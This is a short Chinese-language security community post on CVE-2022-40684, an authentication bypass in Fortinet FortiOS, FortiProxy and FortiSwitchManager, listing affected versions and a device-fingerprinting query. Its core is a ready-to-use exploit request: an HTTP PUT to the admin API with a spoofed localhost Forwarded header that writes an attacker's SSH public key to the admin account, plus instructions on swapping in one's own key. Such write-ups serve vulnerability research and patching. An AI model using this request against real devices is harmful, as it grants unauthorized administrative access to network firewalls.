奇安信攻防社区-Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684

Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684

# Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684 ## 漏洞描述 Fortinet 周一指出，上周修补的 CVE-2022-40684 身份验证绕过安全漏洞，正在野外被广泛利用。作为管理界面上的一...

Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684
==============================================

漏洞描述
----

Fortinet 周一指出，上周修补的 CVE-2022-40684 身份验证绕过安全漏洞，正在野外被广泛利用。作为管理界面上的一个身份验证绕过漏洞，远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager（FSWM）本地管理实例

漏洞影响
----

FortiOS &lt;= 7.2.1、7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0

FortiProxy &lt;= 7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0

FortiSwitchManager &lt;= 7.2.0、7.0.0

网络测绘
----

title="FortiProxy"

漏洞复现
----

登录页面

![img](https://shs3.b.qianxin.com/butian_public/f39180998345c2795b63e95951247c53ef9aa56ab6fdd.jpg)

验证POC, 利用时更换 admin用户名及 ssh-public-key1中的 ssh key 添加远程 SSH登录凭证

```java
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 597
Content-Type: application/json
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
User-Agent: Report Runner

{"ssh-public-key1": "123"}
```

![img](https://shs3.b.qianxin.com/butian_public/f828637bea6c7e70803865c2ce92f05cdd236b7a2003a.jpg)

发表于 2024-07-12 18:49:23
阅读 ( 1104 )
分类：网络设备

Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684

0 条评论